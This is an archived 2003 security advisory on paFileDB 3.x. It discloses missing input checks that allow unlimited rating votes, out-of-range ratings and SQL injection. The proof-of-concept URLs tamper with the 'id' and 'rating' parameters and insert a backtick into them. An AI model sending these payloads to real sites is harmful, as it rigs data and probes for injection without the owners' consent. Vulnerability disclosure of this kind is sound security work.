Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: a6088.htm

paFileDB SQL Injection Vulnerability



24th Mar 2003 [SBWID-6088]
COMMAND

	paFileDB SQL Injection Vulnerability

SYSTEMS AFFECTED

	paFileDB 3.x
	
	Tested on:
	
	         paFileDB 3.0 Final
	         paFileDB 3.0 Beta 3.1
	         paFileDB 3.1 Final

PROBLEM

	FluRDoInG [flur@flurnet.org] [http://www.flurnet.org] says :
	
	paFileDB is a file management script that supports user file rating.  It
	uses an SQL database backend. Multiple vulnerabilities exist due to  the
	lack of checked input variables. The following exploits exist:
	
	  - Modified 'id' tag allows users to submit unlimited ratings.
	  - Hand-edited 'rating' tag allows users to submit ratings above 10 or below 0.
	  - Both tags do not check for escape characters and will allow SQL injection.
	
	
	Proof-Of-Concept Exploits:
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1[RANDOM]&rate=dorate&rating=10
	
	Replace [RANDOM] with a random short string and the script will  not  be
	stop you from voting as many times as you like.
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=1000
	
	Submit file rating of 1000 out of 10. Drive rate up.  Conversely,  -1000
	would have the opposite effect driving the rating down.
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
	http://target/pafiledb/pafiledb.php?action=rate&id=`&rate=dorate&rating=10
	
	SQL Injection vulnerability (exploit code not included)

SOLUTION

	?


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH